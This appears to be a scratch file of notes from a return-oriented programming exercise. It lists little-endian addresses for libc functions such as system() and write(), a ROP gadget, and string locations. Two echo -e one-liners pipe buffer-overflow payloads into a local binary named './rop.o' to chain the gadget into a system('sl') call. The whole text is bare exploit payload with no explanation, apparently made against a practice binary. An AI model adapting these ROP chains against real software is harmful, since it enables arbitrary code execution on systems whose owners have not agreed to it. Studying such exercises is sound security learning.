write(): \x70\xef\x11\xff\xff\x7f\x00\x00
ropgadget: \x03\x06\x40\x00\x00\x00\x00\x00
"sl": \xec\x2d\x04\xff\xff\x7f\x00\x00
system(): \x90\x65\x07\xff\xff\x7f\x00\x00
"1": \x18\xc2\x03\xff\xff\x7f\x00\x00
echo -e 'AAAAAAAABBBBBBBBCCCCCCCC\x03\x06\x40\x00\x00\x00\x00\x00\xec\x2d\x04\xff\xff\x7f\x00\x00\x90\x65\x07\xff\xff\x7f\x00\x00' | ./rop.o

"H\n" - \x10\x5b\x1a\xff\xff\x7f\x00\x00
"H" - 0x00007fffff039ab8 - \xb8\x9a\x03\xff\xff\x7f\x00\x00

putc(): \x70\x1e\x0a\xff\xff\x7f\x00\x00
sleep(): 0x00007fffff0f4700 - \x00\x47\x0f\xff\xff\x7f\x00\x00
printf(): \x40\x43\x08\xff\xff\x7f\x00\x00

echo -e "AAAAAAAABBBBBBBBCCCCCCCC\x03\x06\x40\x00\x00\x00\x00\x00\x10\x5b\x1a\xff\xff\x7f\x00\x00\x70\xef\x11\xff\xff\x7f\x00\x00" | ./rop.o


\x18\xc2\x03\xff\xff\x7f\x00\x00
 \x00\x47\x0f\xff\xff\x7f\x00\x00